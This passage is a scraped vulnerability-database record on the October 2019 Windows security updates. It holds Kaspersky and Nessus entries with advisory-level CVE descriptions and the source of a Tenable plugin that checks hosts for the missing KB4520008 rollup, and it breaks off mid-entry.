\n[CVE-2019-1358](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1358>)0.0Unknown \n[CVE-2019-1378](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1378>)0.0Unknown \n[CVE-2019-1343](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1343>)0.0Unknown \n[CVE-2019-1317](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1317>)0.0Unknown \n[CVE-2019-1325](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1325>)0.0Unknown\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4520010](<http://support.microsoft.com/kb/4520010>) \n[4520008](<http://support.microsoft.com/kb/4520008>) \n[4520007](<http://support.microsoft.com/kb/4520007>) \n[4519998](<http://support.microsoft.com/kb/4519998>) \n[4520005](<http://support.microsoft.com/kb/4520005>) \n[4519990](<http://support.microsoft.com/kb/4519990>) \n[4519985](<http://support.microsoft.com/kb/4519985>) \n[4517389](<http://support.microsoft.com/kb/4517389>) \n[4519338](<http://support.microsoft.com/kb/4519338>) \n[4520011](<http://support.microsoft.com/kb/4520011>) \n[4520004](<http://support.microsoft.com/kb/4520004>) \n[4519337](<http://support.microsoft.com/kb/4519337>) \n[4519765](<http://support.microsoft.com/kb/4519765>) \n[4519335](<http://support.microsoft.com/kb/4519335>) \n[4519336](<http://support.microsoft.com/kb/4519336>) \n[4519764](<http://support.microsoft.com/kb/4519764>) \n[4023814](<http://support.microsoft.com/kb/4023814>) \n[4517388](<http://support.microsoft.com/kb/4517388>)", "edition": 1, "modified": "2020-07-22T00:00:00", "published": "2019-10-08T00:00:00", "id": "KLA11574", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11574", "title": "\r KLA11574Multiple vulnerabilities in Microsoft Windows ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2020-11-15T06:23:10", "description": "The remote Windows host is missing security update 4520008.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows AppX Deployment Server that allows file creation\n in arbitrary locations. (CVE-2019-1340)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n does not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could\n impersonate a user request by crafting HTTP queries. The\n specially crafted website could either spoof content or\n serve as a pivot to chain an attack with other\n vulnerabilities in web services. (CVE-2019-0608)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge (HTML-based). The vulnerability\n could corrupt memory in such a way that an attacker\n could execute arbitrary code in the context of the\n current user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2019-1307, CVE-2019-1308, \n CVE-2019-1335)\n\n - A denial of service vulnerability exists when Windows\n improperly handles hard links. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1317)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1343,\n CVE-2019-1346, CVE-2019-1347)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2019-1342)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1238)\n\n - An information disclosure vulnerability exists when the\n Windows Hyper-V Network Switch on a host operating\n system fails to properly validate input from an\n authenticated user on a guest operating system.\n (CVE-2019-1230)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-1371)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows Setup when it does not properly handle\n privileges. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could then install programs; view,\n change or delete data. (CVE-2019-1316)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1334, CVE-2019-1345)\n\n - A spoofing vulnerability exists when Transport Layer\n Security (TLS) accesses non- Extended Master Secret\n (EMS) sessions. An attacker who successfully exploited\n this vulnerability may gain access to unauthorized\n information. (CVE-2019-1318)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles authentication requests. An\n attacker who successfully exploited this vulnerability\n could run processes in an elevated context. An attacker\n could exploit this vulnerability by running a specially\n crafted application on the victim system. The update\n addresses the vulnerability by correcting the way\n Windows handles authentication requests. (CVE-2019-1320,\n CVE-2019-1322)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2019-1060)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1333)\n\n - A security feature bypass exists when Windows Secure\n Boot improperly restricts access to debugging\n functionality. An attacker who successfully exploited\n this vulnerability could disclose protected kernel\n memory. (CVE-2019-1368)\n\n - A tampering vulnerability exists in Microsoft Windows\n when a man-in-the-middle attacker is able to\n successfully bypass the NTLM MIC (Message Integrity\n Check) protection. An attacker who successfully\n exploited this vulnerability could gain the ability to\n downgrade NTLM security features. (CVE-2019-1166)\n\n - An elevation of privilege vulnerability exists in the\n Windows redirected drive buffering system (rdbss.sys)\n when the operating system improperly handles specific\n local calls within Windows 7 for 32-bit systems. When\n this vulnerability is exploited within other versions of\n Windows it can cause a denial of service, but not an\n elevation of privilege. (CVE-2019-1325)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles hard\n links. An attacker who successfully exploited this\n vulnerability could overwrite a targeted file leading to\n an elevated status. (CVE-2019-1315, CVE-2019-1339)\n\n - An elevation of privilege vulnerability exists when\n Microsoft IIS Server fails to check the length of a\n buffer prior to copying memory to it. An attacker who\n successfully exploited this vulnerability can allow an\n unprivileged function ran by the user to execute code in\n the context of NT AUTHORITY\\system escaping the Sandbox.\n The security update addresses the vulnerability by\n correcting how Microsoft IIS Server sanitizes web\n requests. (CVE-2019-1365)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n improperly handle browser cookies. An attacker who\n successfully exploited this vulnerability could trick a\n browser into overwriting a secure cookie with an\n insecure cookie. The insecure cookie could serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2019-1357)\n\n - An elevation of privilege vulnerability exists when\n Windows CloudStore improperly handles file Discretionary\n Access Control List (DACL). An attacker who successfully\n exploited this vulnerability could overwrite a targeted\n file leading to an elevated status. (CVE-2019-1321)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1358, CVE-2019-1359)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Code Integrity Module handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2019-1344)\n\n - A remote code execution vulnerability exists when the\n Windows Imaging API improperly handles objects in\n memory. The vulnerability could corrupt memory in a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. (CVE-2019-1311)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1326)\n\n - An elevation of privilege vulnerability exists when\n umpo.dll of the Power Service, improperly handles a\n Registry Restore Key function. An attacker who\n successfully exploited this vulnerability could delete a\n targeted registry key leading to an elevated status.\n (CVE-2019-1341)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2019-1319)\n\n - A remote code execution vulnerability exists in the way \n that the Chakra scripting engine handles objects in \n memory in Microsoft Edge (HTML-based). The vulnerability\n could corrupt memory in such a way that an attacker could \n execute arbitrary code in the context of the current user. \n An attacker who successfully exploited the vulnerability \n could gain the same user rights as the current user. If \n the current user is logged on with administrative user \n rights, an attacker who successfully exploited the \n vulnerability could take control of an affected system. \n An attacker could then install programs; view, change, \n or delete data; or create new accounts with full user \n rights. (CVE-2019-1366)", "edition": 15, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-10-08T00:00:00", "title": "KB4520008: Windows 10 Version 1803 October 2019 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-1342", "CVE-2019-1307", "CVE-2019-1319", "CVE-2019-1060", "CVE-2019-1318", "CVE-2019-1366", "CVE-2019-1341", "CVE-2019-1347", "CVE-2019-1322", "CVE-2019-1321", "CVE-2019-1371", "CVE-2019-1316", "CVE-2019-1238", "CVE-2019-1326", "CVE-2019-1359", "CVE-2019-1230", "CVE-2019-1166", "CVE-2019-1358", "CVE-2019-1311", "CVE-2019-1365", "CVE-2019-1340", "CVE-2019-1346", "CVE-2019-1344", "CVE-2019-1343", "CVE-2019-1345", "CVE-2019-1315", "CVE-2019-1335", "CVE-2019-1333", "CVE-2019-1368", "CVE-2019-1325", "CVE-2019-1308", "CVE-2019-1320", "CVE-2019-1334", "CVE-2019-1339", "CVE-2019-1317", "CVE-2019-0608", "CVE-2019-1357"], "modified": "2019-10-08T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS19_OCT_4520008.NASL", "href": "https://www.tenable.com/plugins/nessus/129724", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(129724);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/13\");\n\n script_cve_id(\n \"CVE-2019-0608\",\n \"CVE-2019-1060\",\n \"CVE-2019-1166\",\n \"CVE-2019-1230\",\n \"CVE-2019-1238\",\n \"CVE-2019-1307\",\n \"CVE-2019-1308\",\n \"CVE-2019-1311\",\n \"CVE-2019-1315\",\n \"CVE-2019-1316\",\n \"CVE-2019-1317\",\n \"CVE-2019-1318\",\n \"CVE-2019-1319\",\n \"CVE-2019-1320\",\n \"CVE-2019-1321\",\n \"CVE-2019-1322\",\n \"CVE-2019-1325\",\n \"CVE-2019-1326\",\n \"CVE-2019-1333\",\n \"CVE-2019-1334\",\n \"CVE-2019-1335\",\n \"CVE-2019-1339\",\n \"CVE-2019-1340\",\n \"CVE-2019-1341\",\n \"CVE-2019-1342\",\n \"CVE-2019-1343\",\n \"CVE-2019-1344\",\n \"CVE-2019-1345\",\n \"CVE-2019-1346\",\n \"CVE-2019-1347\",\n \"CVE-2019-1357\",\n \"CVE-2019-1358\",\n \"CVE-2019-1359\",\n \"CVE-2019-1365\",\n \"CVE-2019-1366\",\n \"CVE-2019-1368\",\n \"CVE-2019-1371\"\n );\n script_xref(name:\"MSKB\", value:\"4520008\");\n script_xref(name:\"MSFT\", value:\"MS19-4520008\");\n\n script_name(english:\"KB4520008: Windows 10 Version 1803 October 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4520008.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows AppX Deployment Server that allows file creation\n in arbitrary locations. (CVE-2019-1340)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n does not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could\n impersonate a user request by crafting HTTP queries. The\n specially crafted website could either spoof content or\n serve as a pivot to chain an attack with other\n vulnerabilities in web services. (CVE-2019-0608)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge (HTML-based). The vulnerability\n could corrupt memory in such a way that an attacker\n could execute arbitrary code in the context of the\n current user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2019-1307, CVE-2019-1308, \n CVE-2019-1335)\n\n - A denial of service vulnerability exists when Windows\n improperly handles hard links. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1317)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1343,\n CVE-2019-1346, CVE-2019-1347)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2019-1342)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1238)\n\n - An information disclosure vulnerability exists when the\n Windows Hyper-V Network Switch on a host operating\n system fails to properly validate input from an\n authenticated user on a guest operating system.\n (CVE-2019-1230)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-1371)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows Setup when it does not properly handle\n privileges. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could then install programs; view,\n change or delete data. (CVE-2019-1316)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1334, CVE-2019-1345)\n\n - A spoofing vulnerability exists when Transport Layer\n Security (TLS) accesses non- Extended Master Secret\n (EMS) sessions. An attacker who successfully exploited\n this vulnerability may gain access to unauthorized\n information. (CVE-2019-1318)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles authentication requests. An\n attacker who successfully exploited this vulnerability\n could run processes in an elevated context. An attacker\n could exploit this vulnerability by running a specially\n crafted application on the victim system. The update\n addresses the vulnerability by correcting the way\n Windows handles authentication requests. (CVE-2019-1320,\n CVE-2019-1322)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2019-1060)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1333)\n\n - A security feature bypass exists when Windows Secure\n Boot improperly restricts access to debugging\n functionality. An attacker who successfully exploited\n this vulnerability could disclose protected kernel\n memory. (CVE-2019-1368)\n\n - A tampering vulnerability exists in Microsoft Windows\n when a man-in-the-middle attacker is able to\n successfully bypass the NTLM MIC (Message Integrity\n Check) protection. An attacker who successfully\n exploited this vulnerability could gain the ability to\n downgrade NTLM security features. (CVE-2019-1166)\n\n - An elevation of privilege vulnerability exists in the\n Windows redirected drive buffering system (rdbss.sys)\n when the operating system improperly handles specific\n local calls within Windows 7 for 32-bit systems. When\n this vulnerability is exploited within other versions of\n Windows it can cause a denial of service, but not an\n elevation of privilege. (CVE-2019-1325)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles hard\n links. An attacker who successfully exploited this\n vulnerability could overwrite a targeted file leading to\n an elevated status. (CVE-2019-1315, CVE-2019-1339)\n\n - An elevation of privilege vulnerability exists when\n Microsoft IIS Server fails to check the length of a\n buffer prior to copying memory to it. An attacker who\n successfully exploited this vulnerability can allow an\n unprivileged function ran by the user to execute code in\n the context of NT AUTHORITY\\system escaping the Sandbox.\n The security update addresses the vulnerability by\n correcting how Microsoft IIS Server sanitizes web\n requests. (CVE-2019-1365)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n improperly handle browser cookies. An attacker who\n successfully exploited this vulnerability could trick a\n browser into overwriting a secure cookie with an\n insecure cookie. The insecure cookie could serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2019-1357)\n\n - An elevation of privilege vulnerability exists when\n Windows CloudStore improperly handles file Discretionary\n Access Control List (DACL). An attacker who successfully\n exploited this vulnerability could overwrite a targeted\n file leading to an elevated status. (CVE-2019-1321)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1358, CVE-2019-1359)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Code Integrity Module handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2019-1344)\n\n - A remote code execution vulnerability exists when the\n Windows Imaging API improperly handles objects in\n memory. The vulnerability could corrupt memory in a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. (CVE-2019-1311)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1326)\n\n - An elevation of privilege vulnerability exists when\n umpo.dll of the Power Service, improperly handles a\n Registry Restore Key function. An attacker who\n successfully exploited this vulnerability could delete a\n targeted registry key leading to an elevated status.\n (CVE-2019-1341)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2019-1319)\n\n - A remote code execution vulnerability exists in the way \n that the Chakra scripting engine handles objects in \n memory in Microsoft Edge (HTML-based). The vulnerability\n could corrupt memory in such a way that an attacker could \n execute arbitrary code in the context of the current user. \n An attacker who successfully exploited the vulnerability \n could gain the same user rights as the current user. If \n the current user is logged on with administrative user \n rights, an attacker who successfully exploited the \n vulnerability could take control of an affected system. \n An attacker could then install programs; view, change, \n or delete data; or create new accounts with full user \n rights. (CVE-2019-1366)\");\n # https://support.microsoft.com/en-us/help/4520008/windows-10-update-kb4520008\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0ed66c5d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4520008.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1359\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft UPnP Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/10/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-10\";\nkbs = make_list('4520008');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"17134\",\n rollup_date:\"10_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4520008])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-15T06:23:06", "description": "The remote Windows host is missing security update 4517389.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows AppX Deployment Server that allows file creation\n in arbitrary locations. (CVE-2019-1340)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n does not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could\n impersonate a user request by crafting HTTP queries. The\n specially crafted website could either spoof content or\n serve as a pivot to chain an attack with other\n vulnerabilities in web services. (CVE-2019-0608)\n\n - A denial of service vulnerability exists when Windows\n improperly handles hard links. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1317)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge (HTML-based). The vulnerability\n could corrupt memory in such a way that an attacker\n could execute arbitrary code in the context of the\n current user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2019-1307, CVE-2019-1308, \n CVE-2019-1335)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1343,\n CVE-2019-1346, CVE-2019-1347)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2019-1342)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1238)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Windows Update Client when it does not\n properly handle privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2019-1323,\n CVE-2019-1336)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-1371)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows Setup when it does not properly handle\n privileges. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could then install programs; view,\n change or delete data. (CVE-2019-1316)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1334, CVE-2019-1345)\n\n - A spoofing vulnerability exists when Transport Layer\n Security (TLS) accesses non- Extended Master Secret\n (EMS) sessions. An attacker who successfully exploited\n this vulnerability may gain access to unauthorized\n information. (CVE-2019-1318)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles authentication requests. An\n attacker who successfully exploited this vulnerability\n could run processes in an elevated context. An attacker\n could exploit this vulnerability by running a specially\n crafted application on the victim system. The update\n addresses the vulnerability by correcting the way\n Windows handles authentication requests. (CVE-2019-1320,\n CVE-2019-1322)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2019-1060)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1333)\n\n - An information disclosure vulnerability exists when \n Microsoft Edge based on Edge HTML improperly handles \n objects in memory. An attacker who successfully exploited \n the vulnerability could obtain information to further \n compromise the user\u00e2\u0080\u0099s system. To exploit the vulnerability, \n in a web-based attack scenario, an attacker could host a \n website in an attempt to exploit the vulnerability. In \n addition, compromised websites and websites that accept \n or host user-provided content could contain specially \n crafted content that could exploit the vulnerability. \n (CVE-2019-1356)\n\n - A security feature bypass exists when Windows Secure\n Boot improperly restricts access to debugging\n functionality. An attacker who successfully exploited\n this vulnerability could disclose protected kernel\n memory. (CVE-2019-1368)\n\n - A tampering vulnerability exists in Microsoft Windows\n when a man-in-the-middle attacker is able to\n successfully bypass the NTLM MIC (Message Integrity\n Check) protection. An attacker who successfully\n exploited this vulnerability could gain the ability to\n downgrade NTLM security features. (CVE-2019-1166)\n\n - An elevation of privilege vulnerability exists in the\n Windows redirected drive buffering system (rdbss.sys)\n when the operating system improperly handles specific\n local calls within Windows 7 for 32-bit systems. When\n this vulnerability is exploited within other versions of\n Windows it can cause a denial of service, but not an\n elevation of privilege. (CVE-2019-1325)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles hard\n links. An attacker who successfully exploited this\n vulnerability could overwrite a targeted file leading to\n an elevated status. (CVE-2019-1315, CVE-2019-1339)\n\n - An elevation of privilege vulnerability exists when\n Microsoft IIS Server fails to check the length of a\n buffer prior to copying memory to it. An attacker who\n successfully exploited this vulnerability can allow an\n unprivileged function ran by the user to execute code in\n the context of NT AUTHORITY\\system escaping the Sandbox.\n The security update addresses the vulnerability by\n correcting how Microsoft IIS Server sanitizes web\n requests. (CVE-2019-1365)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n improperly handle browser cookies. An attacker who\n successfully exploited this vulnerability could trick a\n browser into overwriting a secure cookie with an\n insecure cookie. The insecure cookie could serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2019-1357)\n\n - An elevation of privilege vulnerability exists when\n Windows CloudStore improperly handles file Discretionary\n Access Control List (DACL). An attacker who successfully\n exploited this vulnerability could overwrite a targeted\n file leading to an elevated status. (CVE-2019-1321)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1358, CVE-2019-1359)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Code Integrity Module handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2019-1344)\n\n - A remote code execution vulnerability exists when the\n Windows Imaging API improperly handles objects in\n memory. The vulnerability could corrupt memory in a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. (CVE-2019-1311)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1326)\n\n - An information disclosure vulnerability exists when\n Windows Update Client fails to properly handle objects\n in memory. An attacker who successfully exploited the\n vulnerability could potentially disclose memory 